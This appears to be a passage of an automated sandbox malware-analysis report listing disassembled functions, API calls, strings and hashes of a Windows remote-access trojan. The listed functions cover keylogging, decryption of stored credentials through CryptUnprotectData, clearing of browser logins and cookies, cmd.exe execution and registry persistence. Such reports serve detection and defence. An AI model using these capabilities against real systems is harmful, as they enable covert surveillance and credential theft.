                                                                                                                                                                    • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                                                                                                                                    • Opcode Fuzzy Hash: be62f0baf0bcad7a1b9072f9f99ce740f4c070c9bc296d2e33669ce4abd8d70a
                                                                                                                                                                    • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040B164 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                                                                                                                                    • wsprintfW.USER32 ref: 0040B1F3
                                                                                                                                                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EventLocalTimewsprintf
                                                                                                                                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                                                                    • API String ID: 1497725170-1359877963
                                                                                                                                                                    • Opcode ID: e4552b0192bd537bdbb23f0e75db06edbf34c480acb40bb552d9b356009e7e4b
                                                                                                                                                                    • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                                                                                                                                    • Opcode Fuzzy Hash: e4552b0192bd537bdbb23f0e75db06edbf34c480acb40bb552d9b356009e7e4b
                                                                                                                                                                    • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                                                                                                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                                                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                    • String ID: Online Keylogger Started
                                                                                                                                                                    • API String ID: 112202259-1258561607
                                                                                                                                                                    • Opcode ID: c54ea447ec553110fbd8b6a53cbfd27dae09f4e423abdb6fb40980f5ac29de0a
                                                                                                                                                                    • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                                                                                                                                    • Opcode Fuzzy Hash: c54ea447ec553110fbd8b6a53cbfd27dae09f4e423abdb6fb40980f5ac29de0a
                                                                                                                                                                    • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                    • String ID: CryptUnprotectData$crypt32
                                                                                                                                                                    • API String ID: 2574300362-2380590389
                                                                                                                                                                    • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                                                                                                                    • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                                                                                                                                    • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                                                                                                                    • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                    • String ID: Connection Timeout
                                                                                                                                                                    • API String ID: 2055531096-499159329
                                                                                                                                                                    • Opcode ID: b2d32d1c486696acff87f5af967792298d31230c8842a0f6a1d2fc38208b6c67
                                                                                                                                                                    • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                                                                                                                                    • Opcode Fuzzy Hash: b2d32d1c486696acff87f5af967792298d31230c8842a0f6a1d2fc38208b6c67
                                                                                                                                                                    • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throw
                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                    • API String ID: 2005118841-1866435925
                                                                                                                                                                    • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                                                                                                                    • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                                                                                                                                    • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                                                                                                                    • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                                                                                                                                                    • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                                                                                                                                                                    • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                                                    • String ID: pth_unenc
                                                                                                                                                                    • API String ID: 1818849710-4028850238
                                                                                                                                                                    • Opcode ID: 210aa44c52a68b7c494be322e069a8729df8d16b2189e0ff8345c6a7aa3328f8
                                                                                                                                                                    • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                                                                                                                                    • Opcode Fuzzy Hash: 210aa44c52a68b7c494be322e069a8729df8d16b2189e0ff8345c6a7aa3328f8
                                                                                                                                                                    • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                                                                                                                                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                                                                                                                                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                    • API String ID: 3628047217-1405518554
                                                                                                                                                                    • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                                                                                                                                    • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                                                                                                                                    • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                                                                                                                                    • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                                                                                                                                    • ShowWindow.USER32(00000009), ref: 00416C61
                                                                                                                                                                    • SetForegroundWindow.USER32 ref: 00416C6D
                                                                                                                                                                      • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                                                                                                                                      • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                                                                                                                      • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                                                                                                                      • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                                                                    • String ID: !D@
                                                                                                                                                                    • API String ID: 186401046-604454484
                                                                                                                                                                    • Opcode ID: 270a81812c9a9c954965cfdd6a4c81df0ea1f3669daa27631f06eddb7f53d270
                                                                                                                                                                    • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                                                                                                                                    • Opcode Fuzzy Hash: 270a81812c9a9c954965cfdd6a4c81df0ea1f3669daa27631f06eddb7f53d270
                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExecuteShell
                                                                                                                                                                    • String ID: /C $cmd.exe$open
                                                                                                                                                                    • API String ID: 587946157-3896048727
                                                                                                                                                                    • Opcode ID: 923967a6fd708c61b5fab5092c6e20093a8ff39dac1bf6b49590002de37b7fcd
                                                                                                                                                                    • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                                                                                                                                    • Opcode Fuzzy Hash: 923967a6fd708c61b5fab5092c6e20093a8ff39dac1bf6b49590002de37b7fcd
                                                                                                                                                                    • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • TerminateThread.KERNEL32(Function_0000A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                                                                                                                    • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                                                                                                                    • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                    • String ID: pth_unenc
                                                                                                                                                                    • API String ID: 3123878439-4028850238
                                                                                                                                                                    • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                                                                                                                    • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                                                                                                                                                    • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                                                                                                                    • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                    • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                                                                                                                    • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                                                                                                                                    • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                                                                                                                    • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00456C1A Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                    • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                                                                                                                    • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                                                                                                                                    • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                                                                                                    • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                                                                                                                                    • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                                                                                                    • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C86E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,274C6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 274C8731
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 274C87BA
                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 274C87CC
                                                                                                                                                                    • __freea.LIBCMT ref: 274C87D5
                                                                                                                                                                      • Part of subcall function 274C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 274C5702
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                    • Opcode ID: 8ed4c0a55ee5052b9195ce67e45420a477f64fad6c0a63b20c03f12da482926e
                                                                                                                                                                    • Instruction ID: e314b96fdb02994ac375e0b23be7138f3d2fc2e990de3f1b64fd3c78dc07b3b1
                                                                                                                                                                    • Opcode Fuzzy Hash: 8ed4c0a55ee5052b9195ce67e45420a477f64fad6c0a63b20c03f12da482926e
                                                                                                                                                                    • Instruction Fuzzy Hash: 3031AE36A0121AEBDF15CF65CC82EEF7BA9EB40610F11016DED04D6250EB35D991CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                                                                                                                                    • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                    • API String ID: 3472027048-1236744412
                                                                                                                                                                    • Opcode ID: bc362d70cf4f5ad946d2d6bce893b7e03ef5b56e408b8141a290fd3d2dbf3af0
                                                                                                                                                                    • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                                                                                                                                                    • Opcode Fuzzy Hash: bc362d70cf4f5ad946d2d6bce893b7e03ef5b56e408b8141a290fd3d2dbf3af0
                                                                                                                                                                    • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                                                                                                                                                      • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
